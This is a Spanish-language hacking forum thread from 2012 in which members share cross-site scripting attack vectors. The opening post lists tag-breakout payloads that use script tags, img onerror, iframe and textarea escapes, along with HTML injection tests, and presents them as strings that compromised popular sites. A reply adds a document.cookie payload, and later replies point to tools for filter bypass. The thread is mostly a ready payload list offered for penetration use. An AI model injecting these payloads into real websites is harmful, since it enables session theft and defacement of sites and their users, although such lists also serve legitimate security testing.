Bienvenido(a) a la comunidad, Visitante. Por favor, Ingresa tu usuario o Regístrate Gratis!.
Mayo 22, 2013, 06:00:02

Avisos:
Registrarse  
Revista digital Dhackers! Bajala Gratis!
Páginas: [1]   Ir Abajo
« anterior próximo »
Imprimir
Tema: Vectores de Ataque Xss by Dedalo  (Leído 561 veces) Valoracion media: 0
0 Usuarios y 1 Visitante están viendo este tema.
arthusu
Dhackers!
Colaborador Experto
*****

Gracias Recibidas: 55
Desconectado Desconectado

Sexo: Masculino
Mensajes: 2,274

"Yo sólo sé que no sé nada." - Sócrates
« : Julio 01, 2012, 09:11:03 »

Se que hay ya muchos Lists de vectores para Xss pero Les voy a pasar los que usé para algunos de mis mejores Xss:

Código:
"><script>alert(0)</script>
</title><script>alert(/SeguridadBlanca/)</script>
"/><script>alert(1);</script>
'"><script>alert(0);</script>
"><iframe onclick=alert(1)></iframe>
</textarea>"><script>prompt(1)</script>
"><img src=x onerror=prompt(1);>
//>'>"><img src=x onerror=prompt(1);>
"><img src=x onerror=alert(/SeguridadBlanca/);>


Como me gusta chrome el que mas uso para probar antes de mandarme a testear con el firefox para que salten uso:

Código:
"><h1>hols</h1>
"><marquee>sb</h1>
"/><img src=x />

Hasta los populares han caido con estos Vectores...












Fuente: Underc0de

Visiten su web:
Registrarse  
http://www.seguridadblanca.com/
En línea

Registrarse  
nomo11
Moderador Global
Colaborador
*****

Gracias Recibidas: 116
Desconectado Desconectado

Sexo: Masculino
Mensajes: 981


^^ !
« RESPONDER #1 : Julio 01, 2012, 10:06:19 »

verde man andaba buscando un tuto asi no lo encontraba
Like +1
En línea
arthusu
Dhackers!
Colaborador Experto
*****

Gracias Recibidas: 55
Desconectado Desconectado

Sexo: Masculino
Mensajes: 2,274

"Yo sólo sé que no sé nada." - Sócrates
« RESPONDER #2 : Julio 01, 2012, 10:40:10 »

Cita de: nomo11 en Julio 01, 2012, 10:06:19
verde man andaba buscando un tuto asi no lo encontraba
Like +1

jeje no es un tuto son vectores de xss para penetracion xD :P
En línea

Registrarse  
nomo11
Moderador Global
Colaborador
*****

Gracias Recibidas: 116
Desconectado Desconectado

Sexo: Masculino
Mensajes: 981


^^ !
« RESPONDER #3 : Julio 01, 2012, 10:41:49 »

Cita de: arthusu en Julio 01, 2012, 10:40:10
Cita de: nomo11 en Julio 01, 2012, 10:06:19
verde man andaba buscando un tuto asi no lo encontraba
Like +1

jeje no es un tuto son vectores de xss para penetracion xD :P


Bueno man, pero lo andaba buscando jaja
por todos lados habia pero no habia nada claro man
En línea
nomo11
Moderador Global
Colaborador
*****

Gracias Recibidas: 116
Desconectado Desconectado

Sexo: Masculino
Mensajes: 981


^^ !
« RESPONDER #4 : Agosto 31, 2012, 10:24:31 »

Les dejo uno...

Código:
"><script>alert(document.cookie)</script>

Saludos.
En línea
arthusu
Dhackers!
Colaborador Experto
*****

Gracias Recibidas: 55
Desconectado Desconectado

Sexo: Masculino
Mensajes: 2,274

"Yo sólo sé que no sé nada." - Sócrates
« RESPONDER #5 : Septiembre 01, 2012, 01:36:28 »

Cita de: nomo11 en Agosto 31, 2012, 10:24:31
Les dejo uno...

Código:
"><script>alert(document.cookie)</script>

Saludos.


prueba el xss me es un addon de firefox muy bueno o tambien el tamper data tiene sus xss xD! igual puedes checar el codigo de la web y ir viendo que caracteres acepta para ver un bypass ahi puedes utilizar hackbar para hacer algunos bypass  :P, tambien puedes informarte de nuevos ataques xss en xssed.com donde reportan ataques xss :D el mejor ataque es la creatividad...
saludos nomo11 :D ay nos checamos en el msn xD!
PD: Firefox se esta poniendo mejor la version 15 que estoy usando ahora mismo anda muy bien
« Última modificación: Septiembre 01, 2012, 01:43:53 por arthusu » En línea

Registrarse  
Páginas: [1]   Ir Arriba
Imprimir
« anterior próximo »
Ir a:  



Ingresar con nombre de usuario, contraseña y duración de la sesión
Copyright DH © 2007 - 2013 | Dhackers.com | Powered by SMF 1.1.18 | SMF © 2006-2008, Simple Machines LLC | XHTML 1.0 válido!
Página creada en 0.824 segundos con 35 consultas.

Nuestros Afiliados:
| Nakp | Blog |_ocutus |